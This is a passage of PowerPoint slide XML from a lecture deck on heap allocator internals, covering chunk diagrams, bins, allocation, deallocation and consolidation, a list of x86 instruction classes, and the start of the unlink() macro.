        <p:nvSpPr>
          <p:cNvPr id="1083409" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="4743450"/>
            <a:ext cx="939580" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083410" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="3429000"/>
            <a:ext cx="76200" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 175000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083411" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3771900"/>
            <a:ext cx="932066" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083412" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="2228850"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083413" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="4629150"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083414" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3371850"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083415" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3257550"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083416" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2114550"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083417" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4514850"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083418" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2571750"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>User pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083419" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4972050"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>User pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="877351942"/>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9604" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bin Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049605" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Available chunks are maintained in bins, which are doubly-linked lists of free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bins are organized by sizes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunks are maintained in decreasing sorted order by size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1049606" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="814553" y="4700120"/>
            <a:ext cx="6120523" cy="1721644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1876452907"/>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53700" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053701" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of corresponding bin is scanned (starting backwards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunk of exactly correct size is found (chunk size is equal or bigger by not more than 16 bytes than the requested size), it is returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most-recent remainder of split is used (when large enough)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Split it if it is too big, return it when size is exact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other bins are scanned in increasing order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return chunk of exact size, split one that is too big</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2022058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42" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, push, pop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary arithmetic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add, sub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>imul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>idiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, div, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>and, or, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210956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4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4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4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42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42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42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55748" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Deallocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1055749" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When the chunk to be freed borders the wilderness chunk, it is consolidated into it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the chunk before the one to be freed is unallocated, it is consolidated into a single large chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the chunk after the one to be freed is unallocated, it is consolidated into a single large chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Consolidation of chunks involves operating on the bin, removing the old chunk and adding the consolidated chunk to a new bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="738068475"/>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57796" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunks are handled, their entries have to be taken off or inserted into the corresponding lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is responsible for removing entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used to extract from the list the entry P with its pointers FD and BK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink(P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, BK, FD) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     		  BK = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
